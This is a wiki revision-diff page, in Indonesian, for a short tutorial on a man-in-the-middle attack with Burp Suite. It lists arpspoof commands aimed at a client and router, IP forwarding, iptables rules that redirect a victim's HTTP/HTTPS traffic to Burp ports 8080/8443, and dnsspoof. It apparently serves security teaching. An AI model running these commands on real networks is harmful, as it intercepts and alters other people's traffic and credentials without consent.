Difference between revisions of "MITM: burpsuite"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| (3 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
==arpspoof== | ==arpspoof== | ||
| + | |||
| + | Lakukan arpspoof ke client saja .. | ||
arpspoof -i <interface> -t <target> <router> | arpspoof -i <interface> -t <target> <router> | ||
| Line 9: | Line 11: | ||
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 | ||
| − | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080 | + | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8443 |
| + | |||
| + | |||
| + | iptables -t nat -A PREROUTING -i eth0 -p tcp -s ip.cli.ent --dport 80 -j REDIRECT --to-port 8080 | ||
| + | iptables -t nat -A PREROUTING -i eth0 -p tcp -s ip.cli.ent --dport 443 -j REDIRECT --to-port 8443 | ||
| + | |||
| + | |||
| Line 22: | Line 30: | ||
* klik Proxy > Intercept > Intercept is on | * klik Proxy > Intercept > Intercept is on | ||
| − | + | Kita perlu mengarahkan | |
| − | Kita perlu mengarahkan traffic | + | |
| + | * traffic 80 ke port 8080 + enable invisible proxy | ||
| + | * traffic 443 ke port 8443 + enable invisible proxy | ||
==Pranala Menarik== | ==Pranala Menarik== | ||
* [[MITM]] | * [[MITM]] | ||
Latest revision as of 04:47, 6 October 2018
arpspoof
Lakukan arpspoof ke client saja ..
arpspoof -i <interface> -t <target> <router>
Redirect & IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8443
iptables -t nat -A PREROUTING -i eth0 -p tcp -s ip.cli.ent --dport 80 -j REDIRECT --to-port 8080 iptables -t nat -A PREROUTING -i eth0 -p tcp -s ip.cli.ent --dport 443 -j REDIRECT --to-port 8443
dnsspoof -i <interface>
Burpsuite
burpsuite
Setup
- klik Proxy > Intercept > Intercept is on
Kita perlu mengarahkan
- traffic 80 ke port 8080 + enable invisible proxy
- traffic 443 ke port 8443 + enable invisible proxy